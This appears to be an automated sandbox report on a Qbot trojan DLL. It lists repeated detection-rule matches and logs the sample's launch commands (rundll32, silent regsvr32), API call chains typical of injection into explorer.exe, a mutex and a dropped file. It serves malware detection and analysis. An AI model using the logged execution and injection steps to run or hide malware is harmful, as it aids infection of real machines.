          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0.2.loaddll32.exe.a20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.375314795.0000000002CD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.374998186.0000000004812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.375073363.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000016.00000002.644257904.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000016.00000000.395725211.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.387752109.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000014.00000002.400269525.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.375512437.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000000.00000003.388462943.0000000000926000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000012.00000000.384502411.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000013.00000000.386652741.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000000.00000002.396304567.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.387696513.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027ADA5C GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,2_2_027ADA5C
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AD54A NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,2_2_027AD54A
          Source: _Rsr.dll.22.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
          Source: _Rsr.dll.22.drStatic PE information: Data appended to the last section found
          Source: _Rsr.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\_Rsr.dll"
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GDyZ
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\_Rsr.dll,GHQvB58h2E
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Dsitabei
          Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER9462.tmp
          Source: classification engineClassification label: mal84.troj.evad.winDLL@26/5@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AE503 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,2_2_027AE503
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027ABB07 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,2_2_027ABB07
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{0CAEAD30-9E4C-4B0F-98B0-C842770E35F5}
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4700:120:WilError_01
